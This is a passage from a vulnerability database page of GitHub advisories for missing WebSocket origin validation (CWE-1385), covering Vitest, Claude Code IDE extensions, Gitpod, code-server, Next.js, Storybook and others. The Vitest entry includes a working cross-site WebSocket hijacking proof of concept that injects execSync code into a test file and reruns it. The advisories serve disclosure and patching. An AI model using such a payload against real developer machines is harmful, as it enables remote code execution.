Common Weakness Enumeration

CWE-1385

Allowed

Missing Origin Validation in WebSockets

Abstraction: Variant · Status: Incomplete

The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.

58 vulnerabilities reference this CWE, most recent first.

GHSA-8JV6-9X2J-W49P

Vulnerability from github – Published: 2024-08-15 21:31 – Updated: 2024-08-16 00:32
VLAI
Details

Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-15T19:15:18Z",
    "severity": "CRITICAL"
  },
  "details": "Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.",
  "id": "GHSA-8jv6-9x2j-w49p",
  "modified": "2024-08-16T00:32:04Z",
  "published": "2024-08-15T21:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23168"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Xiexe/XSOverlay-Issue-Tracker"
    },
    {
      "type": "WEB",
      "url": "https://store.steampowered.com/news/app/1173510?emclan=103582791465938574\u0026emgid=7792991106417394332"
    },
    {
      "type": "WEB",
      "url": "https://vuln.ryotak.net/advisories/70"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9CRC-Q9X8-HGQQ

Vulnerability from github – Published: 2025-02-04 17:00 – Updated: 2025-02-04 22:04
VLAI
Summary
Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening
Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.125"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-04T17:00:57Z",
    "nvd_published_at": "2025-02-04T20:15:50Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nArbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.\n\n### Details\nWhen [`api` option](https://vitest.dev/config/#api) is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46\n\nThis WebSocket server has `saveTestFile` API that can edit a test file and `rerun` API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the `saveTestFile` API and then running that file by calling the `rerun` API.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76\n\n### PoC\n1. Open Vitest UI.\n2. Access a malicious web site with the script below.\n3. If you have `calc` executable in `PATH` env var (you\u0027ll likely have it if you are running on Windows), that application will be executed.\n\n```js\n// code from https://github.com/WebReflection/flatted\nconst Flatted=function(n){\"use strict\";function t(n){return t=\"function\"==typeof Symbol\u0026\u0026\"symbol\"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n\u0026\u0026\"function\"==typeof Symbol\u0026\u0026n.constructor===Symbol\u0026\u0026n!==Symbol.prototype?\"symbol\":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f=\"string\",i={},c=\"object\",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p\u003cy;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i\u0026\u0026(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g\u003cm;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c\u0026\u0026u?y(o,new Set,u,f):u;return f.call({\"\":i},\"\",i)},S=function(n,r,o){for(var u=r\u0026\u0026t(r)===c?function(n,t){return\"\"===n||-1\u003cr.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({\"\":n},\"\",n)),v=!y;y\u003cl.length;)v=!0,s[y]=e(l[y++],S,o);return\"[\"+s.join(\",\")+\"]\";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});\n\n// actual code to run\nconst ws = new WebSocket(\u0027ws://localhost:51204/__vitest_api__\u0027)\nws.addEventListener(\u0027message\u0027, e =\u003e {\n    console.log(e.data)\n})\nws.addEventListener(\u0027open\u0027, () =\u003e {\n    ws.send(Flatted.stringify({ t: \u0027q\u0027, i: crypto.randomUUID(), m: \"getFiles\", a: [] }))\n\n    const testFilePath = \"/path/to/test-file/basic.test.ts\" // use a test file returned from the response of \"getFiles\"\n\n    // edit file content to inject command execution\n    ws.send(Flatted.stringify({\n      t: \u0027q\u0027,\n      i: crypto.randomUUID(),\n      m: \"saveTestFile\",\n      a: [testFilePath, \"import child_process from \u0027child_process\u0027;child_process.execSync(\u0027calc\u0027)\"]\n    }))\n    // rerun the tests to run the injected command execution code\n    ws.send(Flatted.stringify({\n      t: \u0027q\u0027,\n      i: crypto.randomUUID(),\n      m: \"rerun\",\n      a: [testFilePath]\n    }))\n})\n```\n\n### Impact\nThis vulnerability can result in remote code execution for users that are using Vitest serve API.",
  "id": "GHSA-9crc-q9x8-hgqq",
  "modified": "2025-02-04T22:04:09Z",
  "published": "2025-02-04T17:00:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/security/advisories/GHSA-9crc-q9x8-hgqq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24964"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/191ef9e34c867d0efd04f49b3d38193a68e825dc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/7ce9fbb4972d45c6fd34c843645ef6f549bbb241"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/e0fe1d81e2d4bcddb1c6ca3c5c3970d8ba697383"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vitest-dev/vitest"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76"
    },
    {
      "type": "WEB",
      "url": "https://vitest.dev/config/#api"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening"
}

GHSA-9F65-56V6-GXW7

Vulnerability from github – Published: 2025-06-23 21:22 – Updated: 2025-06-27 23:07
VLAI
Summary
Claude Code Improper Authorization via websocket connections from arbitrary origins
Details

Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable.

In VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.

Remediation

We released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).

VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks Extension Name: Claude Code for VSCode

Instructions:

  1. Open the list of Extensions (View->Extensions)
  2. Look for Claude Code for VSCode among installed extensions
  3. If you have a version < 1.0.24, click “Update” (or “Uninstall”)
  4. Restart the IDE

All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio Plugin name: Claude Code [Beta]

Instructions:

  1. Open the Plugins list
  2. Look for Claude Code [Beta] among installed extensions
  3. Update (or Uninstall) the plugin if the version is < 0.1.9
  4. Restart the IDE
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@anthropic-ai/claude-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.116"
            },
            {
              "fixed": "1.0.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-52882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-23T21:22:22Z",
    "nvd_published_at": "2025-06-24T20:15:26Z",
    "severity": "HIGH"
  },
  "details": "Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable.  \n\nIn VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.\n\n**Remediation**\n\nWe released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).\n\n**VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks**\nExtension Name: Claude Code for VSCode\n\nInstructions:\n\n1. Open the list of Extensions (View-\u003eExtensions)\n2. Look for Claude Code for VSCode among installed extensions\n3. If you have a version \u003c 1.0.24, click \u201cUpdate\u201d (or \u201cUninstall\u201d)\n4. Restart the IDE \n\n**All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio**\nPlugin name: Claude Code [Beta]\n\nInstructions:\n\n1. Open the Plugins list\n2. Look for Claude Code [Beta] among installed extensions\n3. Update (or Uninstall) the plugin if the version is \u003c 0.1.9\n4. Restart the IDE",
  "id": "GHSA-9f65-56v6-gxw7",
  "modified": "2025-06-27T23:07:59Z",
  "published": "2025-06-23T21:22:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-9f65-56v6-gxw7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52882"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/anthropics/claude-code"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Claude Code Improper Authorization via websocket connections from arbitrary origins"
}

GHSA-C398-4R23-X3C7

Vulnerability from github – Published: 2025-05-16 09:30 – Updated: 2025-05-16 09:30
VLAI
Details

Cross-Site WebSocket Hijacking vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8201"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-16T07:15:46Z",
    "severity": "MODERATE"
  },
  "details": "Cross-Site WebSocket Hijacking\u00a0vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.",
  "id": "GHSA-c398-4r23-x3c7",
  "modified": "2025-05-16T09:30:36Z",
  "published": "2025-05-16T09:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8201"
    },
    {
      "type": "WEB",
      "url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-116/index.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F53G-FRR2-JHPF

Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2024-04-04 05:33
VLAI
Details

An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim’s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0957"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-03T08:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim\u2019s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.",
  "id": "GHSA-f53g-frr2-jhpf",
  "modified": "2024-04-04T05:33:50Z",
  "published": "2023-07-06T19:24:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0957"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/pull/16378"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/pull/16405"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/commit/12956988eec0031f42ffdfa3bdc3359f65628f9f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/commit/673ab6856fa04c13b7b1f2a968e4d090f1d94e4f"
    },
    {
      "type": "WEB",
      "url": "https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=default\u0026orgId=71ccd717-aa2d-4a1e-942e-c768d37e9e0c\u0026tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/releases/tag/release-2022.11.2"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FRJG-G767-7363

Vulnerability from github – Published: 2023-03-23 06:30 – Updated: 2023-03-27 22:32
VLAI
Summary
code-server vulnerable to Missing Origin Validation in WebSockets
Details

Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "code-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26114"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-23T19:58:10Z",
    "nvd_published_at": "2023-03-23T05:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.",
  "id": "GHSA-frjg-g767-7363",
  "modified": "2023-03-27T22:32:09Z",
  "published": "2023-03-23T06:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26114"
    },
    {
      "type": "WEB",
      "url": "https://github.com/coder/code-server/commit/d477972c68fc8c8e8d610aa7287db87ba90e55c7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/coder/code-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/coder/code-server/releases/tag/v4.10.1"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-CODESERVER-3368148"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "code-server vulnerable to Missing Origin Validation in WebSockets"
}

GHSA-JCC7-9WPM-MJ36

Vulnerability from github – Published: 2026-03-17 15:29 – Updated: 2026-03-25 18:51
VLAI
Summary
Next.js: null origin can bypass dev HMR websocket CSRF checks
Details

Summary

In next dev, cross-site protections for internal development endpoints could treat Origin: null as a bypass case even when allowedDevOrigins is configured. This could allow privacy-sensitive or opaque browser contexts, such as sandboxed documents, to access privileged internal dev-server functionality unexpectedly.

Impact

If a developer visits attacker-controlled content while running an affected next dev server with allowedDevOrigins configured, attacker-controlled browser code may be able to connect to internal development endpoints and interact with sensitive dev-server functionality that should have remained blocked.

This issue affects development mode only. It does not affect next start, and it does not expose internal debugging functionality to the network by default.

Patches

Fixed by validating Origin: null through the same cross-site origin-allowance checks used for other origins on internal development endpoints.

Workarounds

If upgrade is not immediately possible: - Do not expose next dev to untrusted networks. - If you use allowedDevOrigins, reject requests and websocket upgrades with Origin: null for internal dev endpoints at your proxy.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "16.0.1"
            },
            {
              "fixed": "16.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27977"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T15:29:48Z",
    "nvd_published_at": "2026-03-18T00:16:19Z",
    "severity": "LOW"
  },
  "details": "## Summary\nIn `next dev`, cross-site protections for internal development endpoints could treat `Origin: null` as a bypass case even when [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins) is configured. This could allow privacy-sensitive or opaque browser contexts, such as sandboxed documents, to access privileged internal dev-server functionality unexpectedly.\n\n## Impact\nIf a developer visits attacker-controlled content while running an affected `next dev` server with [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins) configured, attacker-controlled browser code may be able to connect to internal development endpoints and interact with sensitive dev-server functionality that should have remained blocked.\n\nThis issue affects development mode only. It does not affect `next start`, and it does not expose internal debugging functionality to the network by default.\n\n## Patches\nFixed by validating `Origin: null` through the same cross-site origin-allowance checks used for other origins on internal development endpoints.\n\n## Workarounds\nIf upgrade is not immediately possible:\n- Do not expose `next dev` to untrusted networks.\n- If you use [`allowedDevOrigins`](https://nextjs.org/docs/app/api-reference/config/next-config-js/allowedDevOrigins), reject requests and websocket upgrades with `Origin: null` for internal dev endpoints at your proxy.",
  "id": "GHSA-jcc7-9wpm-mj36",
  "modified": "2026-03-25T18:51:19Z",
  "published": "2026-03-17T15:29:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/security/advisories/GHSA-jcc7-9wpm-mj36"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27977"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/commit/862f9b9bb41d235e0d8cf44aa811e7fd118cee2a"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vercel/next.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/releases/tag/v16.1.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Next.js: null origin can bypass dev HMR websocket CSRF checks"
}

GHSA-M9RR-H88H-H8W6

Vulnerability from github – Published: 2023-09-14 12:30 – Updated: 2024-04-04 07:40
VLAI
Details

Movim prior to version 0.22 is affected by a Cross-Site WebSocket Hijacking vulnerability. This was the result of a missing header validation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-2848"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-09-14T12:15:07Z",
    "severity": "HIGH"
  },
  "details": "Movim prior to version 0.22 is affected by a Cross-Site WebSocket Hijacking vulnerability. This was the result of a missing header validation.",
  "id": "GHSA-m9rr-h88h-h8w6",
  "modified": "2024-04-04T07:40:15Z",
  "published": "2023-09-14T12:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2848"
    },
    {
      "type": "WEB",
      "url": "https://github.com/movim/movim/commit/49e2012aecdf918bb1d16f278fa9ff42fad29a9d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/movim/movim/commit/96372082acd3e5d778a2522a60a1805bf2af31f6"
    },
    {
      "type": "WEB",
      "url": "https://mov.im/node/pubsub.movim.eu/Movim/a2d05925-0427-4f3f-b777-d20571ddddff"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MJF5-7G4M-GX5W

Vulnerability from github – Published: 2026-02-26 15:16 – Updated: 2026-02-26 15:16
VLAI
Summary
Storybook Dev Server is Vulnerable to WebSocket Hijacking
Details

Summary

The WebSocket functionality in Storybook's dev server, used to create and update stories, is vulnerable to WebSocket hijacking. This vulnerability only affects the Storybook dev server; production builds are not impacted.

Details

Exploitation requires a developer to visit a malicious website while their local Storybook dev server is running. Because the WebSocket connection does not validate the origin of incoming connections, a malicious site can silently send WebSocket messages to the local instance without any further user interaction.

If a Storybook dev server is intentionally exposed publicly (e.g. for design reviews or stakeholder demos) the risk is higher, as no malicious site visit is required. Any unauthenticated attacker can send WebSocket messages to it directly.

The vulnerability affects the WebSocket message handlers for creating and saving stories, which can be exploited via unauthorized WebSocket connections to achieve persistent XSS or Remote Code Execution (RCE).

Note: recent versions of Chrome have some protections against this, but Firefox does not.

Impact

This vulnerability can lead to supply chain compromise. Key risks include:

  • Remote Code Execution: The vulnerability can allow attackers to execute malicious code, with the extent of impact depending on the configuration. Server-side RCE is possible in non-default configurations, such as when stories are executed via portable stories in JSDOM, potentially allowing attackers to exfiltrate credentials and environment variables, access source code and the filesystem, establish backdoors, or pivot to internal network resources.
  • Persistent XSS: Malicious payloads are written directly into story source files. If the malicious payload is committed to version control, it becomes part of the codebase and can propagate to deployed Storybook documentation sites, affecting developers and stakeholders who view them.
  • Supply Chain Propagation: If the modified source files are committed, injected code can spread to other team members via git, execute in CI/CD pipelines, and affect shared component libraries used across multiple projects.

Affected versions

8.1 and above. While the exploitable functionality was introduced in 8.1, the patch has been applied to 7.x as a precautionary measure given the underlying WebSocket behaviour.

Recommended actions

Update to one of the patched versions: 7.6.23, 8.6.17, 9.1.19, 10.2.10.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "storybook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.1.0"
            },
            {
              "fixed": "8.6.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "storybook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.7.0-alpha.0"
            },
            {
              "fixed": "9.1.19"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
